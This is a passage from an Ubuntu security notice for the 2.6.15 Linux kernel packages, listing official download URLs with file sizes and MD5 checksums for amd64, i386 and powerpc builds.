98817474a9a662d4c5d79811547b98ef\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-amd64-k8_2.6.15-54.77_amd64.deb\n      Size/MD5: 20785638 cbf0cd088aeff7b0b87df905b9e8468f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-amd64-server_2.6.15-54.77_amd64.deb\n      Size/MD5: 21630872 f56a80007a836fec66ef9a2a94883d97\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-amd64-xeon_2.6.15-54.77_amd64.deb\n      Size/MD5: 19903700 98158564170bf417e3ba7f91263f5f31\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb\n      Size/MD5:    15646 3894b718b3d312c48c92d9ac52252e5d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb\n      Size/MD5:   240370 a8ee1ef17d8c778484a1b5fdc14777b5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb\n      Size/MD5:   202636 2fbb7c2f21624e8c39388ac167f1bca3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb\n      Size/MD5:  1048602 97b108097bf19f308240d1413ad38b64\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb\n      Size/MD5:  1542980 c57046562d168b6e8ee13a25fea0347c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb\n      Size/MD5:   161648 c9463e7a0ebb0c3879f7a6d644751c85\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb\n      Size/MD5:     9832 88ec0bfa3382802a777bcbf9dc7d2220\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb\n      Size/MD5:    80862 c850080cdc776aabab0c7e0e89cdb13d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb\n      Size/MD5:    49172 99f5fcc78a1beea9bbbf9cb455c45707\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb\n      Size/MD5:    35168 9a07d29dedcbed5a44079e64e2bfc911\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb\n      Size/MD5:    70884 86d8342ace381ebf07b2f4ead760797c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb\n      Size/MD5:     6224 55a1df7fa8889b89cd3a009d2d84cbb0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb\n      Size/MD5:     9060 9805d4d7b24730a66d881ec8ffccc203\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb\n      Size/MD5:    57898 4a0c6ab2237785c56a140bb82818578a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb\n      Size/MD5:   123332 cfa831d03acaba7fdcd38cc296245fd7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb\n      Size/MD5:   101028 f5be2f6c6c299d7c732b59fbfc2ea586\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb\n      Size/MD5:    79250 a59e9df8e087eac06df9fbda8a8a6405\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb\n      Size/MD5:  1594790 0bc41203b7830a51a6e1a1b9f981ab15\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb\n      Size/MD5:    72306 6acc47f96a766cc043ee2a4f47edd3d3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb\n      Size/MD5:    12654 5a615c1146e10d37ef89d0d2ffaf770e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb\n      Size/MD5:    33736 850c53ba72802eba8128f9c69786b663\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb\n      Size/MD5:   138534 82827eb2785d66387e75873bcbcb84f9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb\n      Size/MD5:    38938 bb5ec1051b41c083cdd18225b4f0ac24\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-54-amd64-generic-di_2.6.15-54.77_amd64.udeb\n      Size/MD5:   278746 1a19131977b00e345ca43f2da7d78f60\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb\n      Size/MD5:    18976 cc2753f5656925c3015c39979cb8cff3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb\n      Size/MD5:    43460 a322e932de50b99745f263a9c2d07e00\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb\n      Size/MD5:   105212 c109dd4fd0061a526e506e6419e71b24\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb\n      Size/MD5:     2286 47108cbcb70c3749d2b045c6f8c1a1c7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb\n      Size/MD5:    34576 df9c1643a4d064f3db582744ad47a9e0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb\n      Size/MD5:    96952 0fa666be29393ff121f0ff64c45495ea\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb\n      Size/MD5:    37102 f4f2833e372e12fabc8237f05e45bf6d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb\n      Size/MD5:    44078 cdcdb874e1bc26abeec66c66c39dd6e2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb\n      Size/MD5:   167754 575f5b4208371c2e5d11fdd1d8856119\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb\n      Size/MD5:    33938 8578c3357a6f1ddfddaf863d2ac2cfb4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb\n      Size/MD5:   137870 f46efe5131f63f6f6ee7757d1418b81d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb\n      Size/MD5:    46894 7dc4dc6732d97dcf4ec8e854f5f563c6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb\n      Size/MD5:   132998 a70d2f28ac9f08ef9b505fbe034fa9e2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb\n      Size/MD5:   273450 d6d45586cf1dfff150b030e9ef3de755\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb\n      Size/MD5:   102260 7216111ca2c37fc6ef3d6757254f8261\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-54-386-di_2.6.15-54.77_i386.udeb\n      Size/MD5:  1596062 4d81a723f97979546f7a7032411e88ff\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-386_2.6.15-54.77_i386.deb\n      Size/MD5:   863226 924f92be148cb1bb13db4f7252fd644c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-686_2.6.15-54.77_i386.deb\n      Size/MD5:   858374 ddd82deb53082e6ce4b6791ed14dd44f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-k7_2.6.15-54.77_i386.deb\n      Size/MD5:   859558 59451d436d231e187ec193aa4abfe1fc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-server-bigiron_2.6.15-54.77_i386.deb\n      Size/MD5:   867408 e88f0427e3f965f7c8cfd10cf65255a3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-server_2.6.15-54.77_i386.deb\n      Size/MD5:   859510 ff4d32a7389bf7ecdb224525699c1868\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54_2.6.15-54.77_i386.deb\n      Size/MD5:  6917458 fd0a57262224b5c9c03b392deee6dba2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-386_2.6.15-54.77_i386.deb\n      Size/MD5: 21712838 ce53ee29a36dd9cd9228176e6a67d0cf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-686_2.6.15-54.77_i386.deb\n      Size/MD5: 22508152 f8977584a67f926bce6e172b61d483cc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-k7_2.6.15-54.77_i386.deb\n      Size/MD5: 22255354 85be88ae00e9c10d859985cfe320b9ba\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-server-bigiron_2.6.15-54.77_i386.deb\n      Size/MD5: 23618958 0dd94a3c4bc391252914ef536a049eaf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-server_2.6.15-54.77_i386.deb\n      Size/MD5: 23173694 36c092afcfd842937423257362deb71d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb\n      Size/MD5:    15510 9bfea12610a193ecbf077c7dc10b67a2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb\n      Size/MD5:   238530 0d6767483144ccbdfb4d5496dfa1b890\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb\n      Size/MD5:   197046 b779aa690688bd0ce620b3feed37c72f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-54-386-di_2.6.15-54.77_i386.udeb\n      Size/MD5:  1048392 251f698fe32b7aa18b52b8c930d997a4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb\n      Size/MD5:  1740818 be462a74a24ef70208e5af89879da1fb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb\n      Size/MD5:   160828 bee9438c9a9c524335bbde0b07be1313\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb\n      Size/MD5:     9166 1f281ddb8155bd44eca2c0097bd3412e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb\n      Size/MD5:    76484 024d47a314d9e6567fb071e2814622d1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb\n      Size/MD5:    53256 456e910d9e3bde1047c24daef0b5658e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb\n      Size/MD5:    33054 3b0bc0f0738ca6080dd9446a54b22ac7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb\n      Size/MD5:    85630 b46b2de723e39a047552d1bf53422286\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb\n      Size/MD5:     6028 efd9e548799433f47e80be328f92e779\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb\n      Size/MD5:     8762 da11c1b27b852c13e054d4aec99b9f13\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb\n      Size/MD5:    53636 e7c55e0573e7aabc1098bbe9d37c6910\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb\n      Size/MD5:   130776 a254b737d82cd35230628f67effd60d3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb\n      Size/MD5:    98432 f772e922c5ca1f3ea8249c702e72cc73\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb\n      Size/MD5:    77184 1a3d5fed7e2593cd1e324e81e8f73fbc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb\n      Size/MD5:  1768386 bba934fcf1768f4e6616783b67cc0cb6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb\n      Size/MD5:    69570 672c7fe6f046dc6ec11486a62622ed26\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb\n      Size/MD5:    11758 a86954df8c28e894e6849038aec6dd3e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb\n      Size/MD5:    36008 fc0d3c2b5b263bcd9260dcb8a75cf2e3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb\n      Size/MD5:   132566 75fad8a0bac352909402ff2b333fc917\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb\n      Size/MD5:    38564 48aa028998c1382beeecf660aa5aac3a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-54-386-di_2.6.15-54.77_i386.udeb\n      Size/MD5:   299114 f11e7eb80349e04b8f23d8a049f76b56\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:    23724 2db2adaa57d92b7f48688f95179e15e0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:    25950 95c01793a23a24cbff49964e4b8c5585\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:    49326 ab284f2d44d7a2bbc5ea52e67f613b23\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:    51530 a600f307f0f91779acc5c1980c4c3223\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:     2308 4effd1e0af9c3f48e2243691eb8ff6be\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:     2482 a4633265ec8c02ba24ea472625a3a3ee\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:    40196 21e77905b68f5d3872662ab5948dfd94\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:    43758 e439eec68bed9e401fec40c0031434d3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:   112596 caf6e08a7b71ca1051b5d94c62029fe3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:   120666 feb6891c9b38bbcc0d58026e14e2a0f5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:    40850 d1933a4df097dba261b11bbae450cc95\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:    45958 17b93bb9695be9a7cc0cb8bdac26e767\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:    29032 6ca496a4614fc2f0bf880a9f0fdbcb35\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:    29900 538fd9bb6ec6ff9c1cb4c61506a2094e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:   211404 5d35841b61601520fa369d152d3bbd42\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:   225214 3866f620a880044623bbc963a1b15f8f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:    45056 3fd6ac720a4053a1554c515dbdd60d09\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:    40220 342eae2faccd8a8e8235ccbe7a118f44\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:     1936 6eb08d519ab2bf1a5f5fac6e0c832e6d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:     2200 a2f7579c4986495691a7b124fc34c7c0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:    80680 37cbcb404f7c6d42ddf270cb222d97a0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:    86078 ffb8b233eb68841688aa616f1880fcb7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:   111644 8d3233bee5a2d55582bda79b6bd22f1c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:   125774 b1d8fd5c48d3d50a25da84576e3b1c2e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:    53410 9737ace229facb52faba8819b39aaa4f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:    58474 c0dfc0546cd6a326e8e5372286147ebc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:   147772 5add6e71d59aa7b22544c89d236f1264\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:   161708 2e4eaeb64a8a149fe0e89a6aa32c4273\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:   317494 e1e4733d8591ebe9372fe88ed3f0c816\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:   287602 85599af30985f874baa2005e68247c8a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:   115854 b64bea5344a06582f592f8de8493fea0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:   116514 54a687f3c7d632b17400826c8358eec2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:  1924292 af79708a135129928126925812c5e985\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:  2447446 600b87a4f5376d7ed6685dde273d1ca6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-powerpc-smp_2.6.15-54.77_powerpc.deb\n      Size/MD5:   873400 cdb7cb415d400e8e8e9d69fa6a21549d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-powerpc64-smp_2.6.15-54.77_powerpc.deb\n      Size/MD5:   870866 7252b4b7c1a9b0d65e69939157d86e13\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54-powerpc_2.6.15-54.77_powerpc.deb\n      Size/MD5:   868624 fa84e5dae2ee6f9986de8772a1357e23\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-54_2.6.15-54.77_powerpc.deb\n      Size/MD5:  6946740 28fc20a94d95b0b8c02aca0708a74101\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-powerpc-smp_2.6.15-54.77_powerpc.deb\n      Size/MD5: 22776364 389e45cbdd998fa7dafa1229f5737bcb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-powerpc64-smp_2.6.15-54.77_powerpc.deb\n      Size/MD5: 23678834 ea0a1438c2b0a5334b7ac71407cbc868\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-54-powerpc_2.6.15-54.77_powerpc.deb\n      Size/MD5: 22355382 18f2e503843c54824551f54d39b8b468\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:    17782 9933c39eaa26b6c5558399d461d6e4aa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:    17380 4f213deee9b7c625c1fd48d88f048c6c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:   261268 d73545c9cef2251ad094e9e53f889421\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:   282478 b037d7889d3f63d86c3605c945f081dc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:   227640 d6a097d06e05da8ae4676497fe918633\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:   248884 ca8a5caa96f92834425d7ee4a48a95e2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:  1048444 f58af64355ebfa8d71973d7961285aea\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:  1048566 32f48ed1ee827656c9446c79d6802b99\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:  1737706 67f6c275ca396042f8613936eda72c97\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:  1877428 8d0bbebe4eb6e4bf964fb6f440af7789\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:   250878 c171495228a2d3f25a5dab6a1d46ffe5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-54-powerpc64-smp-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:   233632 c6062b42d12fa38bc5fcb59261bfa528\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-54-powerpc-di_2.6.15-54.77_powerpc.udeb\n      Size/MD5:    13026 